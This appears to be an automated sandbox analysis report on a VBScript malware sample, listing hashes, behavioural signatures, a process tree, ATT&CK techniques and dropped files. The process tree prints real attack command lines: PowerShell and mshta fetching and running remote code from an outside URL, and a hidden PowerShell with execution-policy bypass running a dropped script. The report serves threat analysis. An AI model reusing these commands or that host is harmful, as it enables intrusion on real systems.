Analysis

  • max time kernel
    63s
  • max time network
    130s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    08-04-2021 06:49

General

  • Target

    FQ45.vbs

  • Size

    996B

  • MD5

    7c5cdd80461494fe18eae20726676f01

  • SHA1

    9d4ba6a01448c36043854f6a13a5922480c6a26f

  • SHA256

    e5ddae23eb8d248fb190371808ab28d20485a16f2eb0fc238a1fb812f3c52c91

  • SHA512

    9c54062fd3cc99467613562bac1dc29b477492c3ce8b07a1c289c1c4099a036ddcd00c5a0992244d17afda0ee9cb4d308a022c7d4993e64423a46470af64e93c

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Drops startup file 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FQ45.vbs"
    1⤵
    • Drops startup file
    • Suspicious use of WriteProcessMemory
    PID:4020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\mshta https://pazpus.com/bootstrap/cache/zender.txt
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1100
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" https://pazpus.com/bootstrap/cache/zender.txt
        3⤵
        • Blocklisted process makes network request
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:2892
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:4048
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3248
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 708
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:392
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3⤵
          PID:204

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Install Root Certificate

    1
    T1130

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      c6b0a774fa56e0169ed7bb7b25c114dd

      SHA1

      bcdba7d4ecfff2180510850e585b44691ea81ba5

      SHA256

      b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

      SHA512

      42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
      MD5

      2143b379fed61ab5450bab1a751798ce

      SHA1

      32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

      SHA256

      a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

      SHA512

      0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

    • C:\Users\Public\Datax.ps1
      MD5

      1528b8b5cf18ecec9301b85857229cee

      SHA1

      33e9a4e6708165c16aa504a78d12e06b5a114732

      SHA256

      2a8bfceffcf3160eac54e71049566c7dfa2dc0651301b4dfe1c0d247d7ba875c

      SHA512

      4f9b247f87ae844418cf3c210e88b9c745a0ae1249221ce6177be40f92cc23e7a64d29bc6666d942203d8fffefd41a6d62a2ad39cd69bf4a14a8228cd1892d7e

    • memory/204-55-0x0000000003060000-0x0000000003061000-memory.dmp
      Filesize

      4KB

    • memory/204-44-0x0000000005980000-0x0000000005981000-memory.dmp
      Filesize

      4KB

    • memory/204-36-0x0000000073D40000-0x000000007442E000-memory.dmp
      Filesize

      6.9MB

    • memory/204-35-0x00000000004581DE-mapping.dmp
    • memory/392-54-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-63-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-75-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-57-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-91-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-58-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-90-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-77-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-81-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-74-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-72-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-89-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-70-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-71-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-69-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-68-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-84-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-88-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-87-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-65-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-86-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-85-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-67-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-41-0x0000000000000000-mapping.dmp
    • memory/392-66-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-46-0x0000000002670000-0x0000000002671000-memory.dmp
      Filesize

      4KB

    • memory/392-83-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-49-0x0000000002A60000-0x0000000002A61000-memory.dmp
      Filesize

      4KB

    • memory/392-50-0x00000000008C0000-0x00000000008C1000-memory.dmp
      Filesize

      4KB

    • memory/392-82-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-64-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-78-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-56-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-53-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-73-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-59-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-80-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-60-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-62-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/392-61-0x0000000000890000-0x0000000000891000-memory.dmp
      Filesize

      4KB

    • memory/588-22-0x00000262B1053000-0x00000262B1055000-memory.dmp
      Filesize

      8KB

    • memory/588-26-0x00000262B1056000-0x00000262B1058000-memory.dmp
      Filesize

      8KB

    • memory/588-18-0x0000000000000000-mapping.dmp
    • memory/588-19-0x00007FFE02F20000-0x00007FFE0390C000-memory.dmp
      Filesize

      9.9MB

    • memory/588-21-0x00000262B1050000-0x00000262B1052000-memory.dmp
      Filesize

      8KB

    • memory/588-29-0x00000262B1520000-0x00000262B1528000-memory.dmp
      Filesize

      32KB

    • memory/588-28-0x00000262B1510000-0x00000262B151A000-memory.dmp
      Filesize

      40KB

    • memory/1100-3-0x00007FFE081C0000-0x00007FFE08BAC000-memory.dmp
      Filesize

      9.9MB

    • memory/1100-6-0x0000019BD07F0000-0x0000019BD07F1000-memory.dmp
      Filesize

      4KB

    • memory/1100-2-0x0000000000000000-mapping.dmp
    • memory/1100-7-0x0000019BEB1A0000-0x0000019BEB1A1000-memory.dmp
      Filesize

      4KB

    • memory/1100-5-0x0000019BE8CD3000-0x0000019BE8CD5000-memory.dmp
      Filesize

      8KB

    • memory/1100-4-0x0000019BE8CD0000-0x0000019BE8CD2000-memory.dmp
      Filesize

      8KB

    • memory/1100-9-0x0000019BE8CD6000-0x0000019BE8CD8000-memory.dmp
      Filesize

      8KB

    • memory/2700-15-0x0000022143B03000-0x0000022143B05000-memory.dmp
      Filesize

      8KB

    • memory/2700-10-0x0000000000000000-mapping.dmp
    • memory/2700-12-0x00007FFE02F20000-0x00007FFE0390C000-memory.dmp
      Filesize

      9.9MB

    • memory/2700-14-0x0000022143B00000-0x0000022143B02000-memory.dmp
      Filesize

      8KB

    • memory/2700-16-0x0000022143C10000-0x0000022143C11000-memory.dmp
      Filesize

      4KB

    • memory/2892-8-0x0000000000000000-mapping.dmp
    • memory/3248-33-0x00000000004581DE-mapping.dmp
    • memory/3248-38-0x0000000002E90000-0x0000000002E91000-memory.dmp
      Filesize

      4KB

    • memory/4048-47-0x00000000053B0000-0x00000000053B1000-memory.dmp
      Filesize

      4KB

    • memory/4048-31-0x00000000004581DE-mapping.dmp
    • memory/4048-30-0x0000000000400000-0x000000000045E000-memory.dmp
      Filesize

      376KB

    • memory/4048-37-0x0000000073D40000-0x000000007442E000-memory.dmp
      Filesize

      6.9MB

    • memory/4048-76-0x0000000005560000-0x0000000005561000-memory.dmp
      Filesize

      4KB

    • memory/4048-52-0x0000000005450000-0x0000000005451000-memory.dmp
      Filesize

      4KB

    • memory/4048-94-0x00000000060F0000-0x00000000060F1000-memory.dmp
      Filesize

      4KB

    • memory/4048-95-0x00000000064E0000-0x00000000064E1000-memory.dmp
      Filesize

      4KB

    • memory/4048-96-0x0000000006860000-0x0000000006861000-memory.dmp
      Filesize

      4KB